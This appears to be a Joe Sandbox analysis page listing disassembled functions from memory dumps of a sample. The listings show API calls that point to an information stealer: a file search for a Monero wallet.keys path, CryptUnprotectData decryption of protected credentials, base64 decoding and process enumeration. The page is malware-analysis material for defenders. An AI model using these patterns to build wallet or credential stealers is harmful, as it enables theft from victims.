Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0c$QXov$_zD$y!j_$5f~$m?P$}z
API String ID: 0-3845450492
Opcode ID: ddb7a0a9789763d71bf7ac6f770a9784615bc5f0bbc14ddbc8885a3f728cc88c
Instruction ID: 5569191d7d27c5af73ebedf09758438110b164279922bdb3f540cd7c7adf01bd
Opcode Fuzzy Hash: ddb7a0a9789763d71bf7ac6f770a9784615bc5f0bbc14ddbc8885a3f728cc88c
Instruction Fuzzy Hash: E7B204F3A0C2149FE3046E2DEC8567AFBE9EF94720F16493DEAC487344EA3558058697

Function 00A43547 Relevance: 10.3, Strings: 7, Instructions: 1564COMMON

Download Yara Rule

Strings

yL, xrefs: 00A445F5
q%n, xrefs: 00A43FDB
!~, xrefs: 00A44070
Re}*, xrefs: 00A43AD7
6Wd, xrefs: 00A441D8
fK~U, xrefs: 00A43B8E
* s, xrefs: 00A43740

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !~$* s$6Wd$Re}*$fK~U$q%n$yL
API String ID: 0-1637496169
Opcode ID: 65eb011cf6cefa4d7944a39e61e87c0c9d9c051b22df1951e7ba6754ee5cb8d7
Instruction ID: be3b0c0087a3dff656bf6ca6b0eb8bf2365a62b6d776412004966ee2879552dc
Opcode Fuzzy Hash: 65eb011cf6cefa4d7944a39e61e87c0c9d9c051b22df1951e7ba6754ee5cb8d7
Instruction Fuzzy Hash: 32A2F8F36086109FE304AE2DEC8567AFBE9EFD4720F16893DE6C4C7744E63598058692

Function 005FE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00610D79), ref: 005FE5A2
StrCmpCA.SHLWAPI(?,006115F0), ref: 005FE5F2
StrCmpCA.SHLWAPI(?,006115F4), ref: 005FE608
FindNextFileA.KERNEL32(000000FF,?), ref: 005FECDF

Strings

\*.*, xrefs: 005FE54D

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 0ee682ddfd7e2dea2f2b329e32e93875bb93f23f2380d46e6350c0b935c268cd
Instruction ID: 95a029fdc5158870237a8b1597b4570a29d0d43bb96f76f87631b5ddf05d4727
Opcode Fuzzy Hash: 0ee682ddfd7e2dea2f2b329e32e93875bb93f23f2380d46e6350c0b935c268cd
Instruction Fuzzy Hash: 64122172A502189BDB58FBA0DCA6EFF733AAF54340F4045ADA50A560D1EF305B88CF56

Function 005FA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA23F
LocalAlloc.KERNEL32(00000040,?,?,?,005F4F3E,00000000,?), ref: 005FA251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA27A
LocalFree.KERNEL32(?,?,?,?,005F4F3E,00000000,?), ref: 005FA28F

Strings

>O_, xrefs: 005FA224, 005FA231, 005FA249, 005FA268, 005FA234, 005FA26B

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O_
API String ID: 4291131564-1568738855
Opcode ID: 0c7dabc6b7510dd0c994ff6c90a61723f168b1608d73817264eabaa364d86e94
Instruction ID: 7270d513d61600e30e2a814fad2f870cb11d25a139707bcdc82ce23796dca4e6
Opcode Fuzzy Hash: 0c7dabc6b7510dd0c994ff6c90a61723f168b1608d73817264eabaa364d86e94
Instruction Fuzzy Hash: 9F11A4B4240308AFEB11CFA4CC95FAA77B5FB89B10F208458FE199B390C776A941CB50

Function 00A46AAF Relevance: 7.8, Strings: 5, Instructions: 1558COMMON

Download Yara Rule

Strings

[=GV, xrefs: 00A47C9A
Ez, xrefs: 00A46BED
_SY, xrefs: 00A47289
4~2, xrefs: 00A47DA3
W+u, xrefs: 00A47765

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 4~2$Ez$W+u$[=GV$_SY
API String ID: 0-1600416169
Opcode ID: dcab7d19e06c1ec6a7d74fd80e00f3301af6a72eac2e3fb41c5340a5a08235b0
Instruction ID: 503d7075ab3e09442882a1c7f1d78593c623d74c096ccb1923f0971d99202d5c
Opcode Fuzzy Hash: dcab7d19e06c1ec6a7d74fd80e00f3301af6a72eac2e3fb41c5340a5a08235b0
Instruction Fuzzy Hash: ACB205F360C2049FE3046F29EC8567AFBE9EF94720F1A492DEAC483740EA3558558797

Function 00A4F0D3 Relevance: 7.8, Strings: 5, Instructions: 1517COMMON

Download Yara Rule

Strings

!,e, xrefs: 00A4FF7C
$R^, xrefs: 00A4F94B
(}, xrefs: 00A4F5DC
`=w, xrefs: 00A5005D
SVs?, xrefs: 00A4F8C1

Memory Dump Source

Source File: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !,e$$R^$SVs?$(}$`=w
API String ID: 0-1404569011
Opcode ID: acb22097b523b7e99c686be5b0f146ee90387936174184dfc1f53a2df445de96
Instruction ID: 69eef5c54cdc56669875e2596aa671751562f05c94c35cade43042ce57c363ea
Opcode Fuzzy Hash: acb22097b523b7e99c686be5b0f146ee90387936174184dfc1f53a2df445de96
Instruction Fuzzy Hash: 1DA2E5F3A0C2009FE304AF2DEC4567ABBE5EF94720F16893DEAC483344EA7558558697

Function 0065F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

\u, xrefs: 0065FA93
}, xrefs: 0065F99F
\u, xrefs: 0065F9A3
{, xrefs: 0065F9AA
}, xrefs: 0065FA8F
{, xrefs: 0065FA9A

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: \u$\u${${$}$}
API String ID: 0-582841131
Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction ID: ba09e727bd7cf907e3bd80c7ac2c6453530cb6fea385b43e7fe5bd401448d2ad
Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction Fuzzy Hash: AA415E22E19BD9C5CB058B7444A02AEBFB36FD6210F6D42AEC4DD1F782C774414AD3A5

Function 005FC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC97C
lstrcat.KERNEL32(?,00610B47), ref: 005FCA43
lstrcat.KERNEL32(?,00610B4B), ref: 005FCA57
lstrcat.KERNEL32(?,00610B4E), ref: 005FCA78

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: e8210c31ce54c1b7c4b125af86161d2b45e28e3419dacc7604297577494e06fe
Instruction ID: 4b12a67a64c471877a78f54d8e0ae0bbe4c608e3fd44d95ea8c9984a9ccb564d
Opcode Fuzzy Hash: e8210c31ce54c1b7c4b125af86161d2b45e28e3419dacc7604297577494e06fe
Instruction Fuzzy Hash: 6641517490821DDBDB10CFA4DD89FFEBBB9BB48304F1045A8E609A7280D7755A84CF91

Function 005F72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 005F72AD
RtlAllocateHeap.NTDLL(00000000), ref: 005F72B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005F72E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005F7304
LocalFree.KERNEL32(?), ref: 005F730E

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: e6ed559a49c7c2746a63a892369c340fe3edd1cd7ed80f11bf39baa65b8eda1f
Instruction ID: fa052411added108056ee1cdf093cf9b0822f27100b054242ed2e40cf9eee884
Opcode Fuzzy Hash: e6ed559a49c7c2746a63a892369c340fe3edd1cd7ed80f11bf39baa65b8eda1f
Instruction Fuzzy Hash: CB011275A44308BBEB10DFE4DD45FAD7778BB44B00F104545FB05BB2C0D6B0AA409B55

Function 00609790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006097AE
Process32First.KERNEL32(00610ACE,00000128), ref: 006097C2
Process32Next.KERNEL32(00610ACE,00000128), ref: 006097D7
StrCmpCA.SHLWAPI(?,00000000), ref: 006097EC
CloseHandle.KERNEL32(00610ACE), ref: 0060980A

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 69f2b69e9f131e66999740bf6ca40dfa968898d12552e9e31966356e3dac7718
Instruction ID: 46a0f2a0b6251153ba742c3c6ecbaf600a66409c0ca71150ac99f0370b3e08db
Opcode Fuzzy Hash: 69f2b69e9f131e66999740bf6ca40dfa968898d12552e9e31966356e3dac7718
Instruction Fuzzy Hash: D6011E75A54208EBDB24DFA4CD44FDEB7BABB48700F108589E50A97380E7309B40CF60

Function 00614573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON

Download Yara Rule

Strings

huzx, xrefs: 006148F0
<7\h, xrefs: 00614752

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: <7\h$huzx
API String ID: 0-2989614873
Opcode ID: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
Instruction ID: 83965fb849194fd8bd15830c077317ce4424c3bd1ca77ef90938ac015e015aff
Opcode Fuzzy Hash: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
Instruction Fuzzy Hash: 7C63313241EBD45ECB27CB3087B61D1BF67BA5321031D49CEC8C28B5B3C6949A96E356

Function 00A3E497 Relevance: 6.7, Strings: 4, Instructions: 1676COMMON

Download Yara Rule

Strings

jb~}, xrefs: 00A3EC86
u<_, xrefs: 00A3E5C8
